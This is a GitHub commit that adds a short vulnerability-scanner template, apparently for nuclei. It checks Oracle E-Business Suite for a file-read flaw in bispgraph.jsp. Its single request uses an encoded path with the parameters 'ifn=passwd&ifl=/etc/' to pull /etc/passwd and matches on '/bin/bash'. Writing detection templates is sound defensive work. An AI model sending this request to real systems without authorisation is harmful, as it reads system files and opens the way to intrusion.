Oracle EBS Bispgraph File Access Vulnerability

A test to check whether you can read the etc/password file on a vulnerable Oracle Enterprise Business Suite instance
patch-1
Alfie Njeru 2020-07-27 12:25:15 +03:00 committed by GitHub
parent 82f2da04f8
commit 5340a96e4c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 18 additions and 0 deletions

View File

@ -0,0 +1,18 @@
id: Oracle EBS bispgrapgh File Access Vulnerability
# Source: David Lithcfield
info:
name: bispgrapgh File Access Vulnerability
author: Alfie Njeru (@emenalf) - https://the-infosec.com
severity: High
requests:
- method: GET
path:
- "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/"
matchers:
- type: word
words:
- "/bin/bash"